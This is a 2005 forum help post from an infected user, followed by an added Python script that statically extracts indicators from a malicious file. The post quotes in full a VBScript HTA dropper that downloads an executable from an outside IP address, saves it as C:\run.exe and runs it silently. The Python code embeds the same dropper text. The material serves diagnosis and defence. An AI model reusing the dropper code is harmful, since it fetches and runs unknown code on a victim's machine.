Re: Expert needed, TCP DUMP INSIDE, HELP!!!!!

From: derp (dero5150_at_yahoo.com)
Date: 03/13/05


Date: 13 Mar 2005 11:05:49 -0800

Thank you for your response. Got some semi-good news.

Kind of had a hunch I had a virus when, before connecting to Ameritrade
Streamer, I did a netstat -b right when my computer had started; a system
process (I forget which) had connected to a Hotmail mail server. I had to
leave early so I didn't get time to check. By the time I got home my
internet wasn't working and a porn dialer was running (good thing I don't
use dial-up).

1) I did an exhaustive search for the IP (both string and hex search)
throughout the hard drive (70 gigs of data), found 1 DLL with the hex
value (I assume that was by chance since a couple of MP3s came up too).
The string search of every file inside my computer came up with the
same spyware ("0CAT Yellow Pages") that I manually removed earlier
(seems like it somehow installed itself again). It also found
"Dc46.hta" in a folder called "STLinks" in the Programs folder.

Dc46.hta answers a lot of questions; here are the contents:

"Sink started at 2005/03/08 11:05:39.0302
<script language=vbscript>:
on error resume next:
set o = CreateObject("msxml2.XMLHTTP"):
o.open
"GET","http://69.50.160.98/affiliates/exe.php?group=safestep3&id=acc0000",False:
o.send:
set s = createobject("adodb.stream"):
s.type=1:
s.open:
s.write o.responseBody:
s.savetofile "C:\run.exe",2:
Set ws = CreateObject("WScript.Shell"):
ws.Run "C:\run.exe", 3, FALSE:
</script>:
Sink stopped at 2005/03/08 11:05:39.0322"

(kind of obvious what's going on in the script)

2) BTW: I accidentally opened Dc46.hta with FrontPage (after I removed
it and put it on a floppy for future analysis); would that have run the
script?

I have also removed run.exe and put it on a floppy.

3) Don't know what is setting off "run.exe" or "Dc46.hta"; an exhaustive
registry search yielded nothing. How can I find out if the loading
method has been attached to a different non-malicious DLL or EXE?

4) Quick question: if I get a rootkit virus on my computer, is it
theoretically possible for my machine to be sending out packets without
Ethereal or any other service-based packet capturer being able to capture
the data?

5) Can I send these files to anybody so they can be added to future
virus definitions?

Oh, and thank you for telling me about Process Explorer and Active
Ports. Process Explorer is just AMAZING.

Thanks again.
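The Dc46.hta script quoted in the post above is a textbook download-and-execute dropper: msxml2.XMLHTTP fetches a binary from 69.50.160.98, ADODB.Stream writes the response body to C:\run.exe, and WScript.Shell runs it, with "on error resume next" so any failing step is silent. The following is an added example (editor's code, not part of the original post or any tool it mentions) that triages such a script statically, without executing it: regex extraction of the COM ProgIDs, URL, host, dropped path and executed path, followed by a classification of the pattern. The input is the Dc46.hta text from the post, embedded as a raw string; the function names (extract_iocs, classify) and the finding labels are my own, and the regexes are heuristics tuned to this dropper family, not a general VBScript parser.

```python
"""Static triage of a VBScript/HTA dropper: pull out the indicators
(ProgIDs, URLs, dropped and executed paths) and classify the pattern."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Input: the Dc46.hta contents quoted in the post above, embedded here so the
# example runs offline. Raw string so "C:\run.exe" keeps its backslash.
DC46_HTA = r'''Sink started at 2005/03/08 11:05:39.0302
<script language=vbscript>:
on error resume next:
set o = CreateObject("msxml2.XMLHTTP"):
o.open
"GET","http://69.50.160.98/affiliates/exe.php?group=safestep3&id=acc0000",False:
o.send:
set s = createobject("adodb.stream"):
s.type=1:
s.open:
s.write o.responseBody:
s.savetofile "C:\run.exe",2:
Set ws = CreateObject("WScript.Shell"):
ws.Run "C:\run.exe", 3, FALSE:
</script>:
Sink stopped at 2005/03/08 11:05:39.0322'''

# VBScript is case-insensitive, so every pattern is compiled with re.I.
# These are heuristics for this dropper style, not a VBScript parser.
RE_CREATEOBJECT = re.compile(r'createobject\s*\(\s*"([^"]+)"\s*\)', re.I)
RE_URL = re.compile(r'https?://[^\s"\']+', re.I)
RE_HTTP_METHOD = re.compile(r'\.open\s*"(GET|POST)"', re.I)  # \s* spans the wrapped line
RE_SAVETOFILE = re.compile(r'\.savetofile\s+"([^"]+)"', re.I)
RE_SHELL_RUN = re.compile(r'\.run\s+"([^"]+)"', re.I)
RE_SILENCE = re.compile(r'on\s+error\s+resume\s+next', re.I)


def _uniq(items):
    """Order-preserving de-duplication."""
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


@dataclass
class DropperIOCs:
    objects: list = field(default_factory=list)        # COM ProgIDs instantiated
    urls: list = field(default_factory=list)           # remote payload locations
    hosts: list = field(default_factory=list)          # netloc of each URL
    http_methods: list = field(default_factory=list)
    dropped_files: list = field(default_factory=list)  # ADODB.Stream SaveToFile targets
    executed: list = field(default_factory=list)       # WScript.Shell Run targets
    silent_errors: bool = False                        # "on error resume next" present


def extract_iocs(script: str) -> DropperIOCs:
    """Regex-driven indicator extraction; the script is never executed."""
    urls = _uniq(RE_URL.findall(script))
    return DropperIOCs(
        objects=_uniq(RE_CREATEOBJECT.findall(script)),
        urls=urls,
        hosts=_uniq(urlparse(u).netloc for u in urls),
        http_methods=_uniq(m.upper() for m in RE_HTTP_METHOD.findall(script)),
        dropped_files=_uniq(RE_SAVETOFILE.findall(script)),
        executed=_uniq(RE_SHELL_RUN.findall(script)),
        silent_errors=bool(RE_SILENCE.search(script)),
    )


def classify(iocs: DropperIOCs) -> list:
    """Name the behaviours the indicators add up to (labels are my own)."""
    objs = {o.lower() for o in iocs.objects}
    dropped = {p.lower() for p in iocs.dropped_files}
    executed = {p.lower() for p in iocs.executed}
    findings = []
    if objs & {"msxml2.xmlhttp", "microsoft.xmlhttp"} and iocs.urls:
        findings.append("http-download")
    if "adodb.stream" in objs and dropped:
        findings.append("writes-binary-to-disk")
    if "wscript.shell" in objs and (dropped & executed):
        findings.append("download-and-execute")  # the fetched file is what gets run
    if iocs.silent_errors:
        findings.append("suppresses-errors")     # any failing step is hidden
    return findings


if __name__ == "__main__":
    iocs = extract_iocs(DC46_HTA)
    print("objects  :", iocs.objects)
    print("urls     :", iocs.urls)
    print("hosts    :", iocs.hosts)
    print("drops    :", iocs.dropped_files)
    print("runs     :", iocs.executed)
    print("findings :", classify(iocs))
```

The hosts and dropped paths it returns are the things worth searching for next: the host for outbound connections in a capture, the dropped path and its hash for a second copy on disk, and the ProgID chain (XMLHTTP, ADODB.Stream, WScript.Shell in one short script) as a signature for other HTA or VBS files found the same way.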
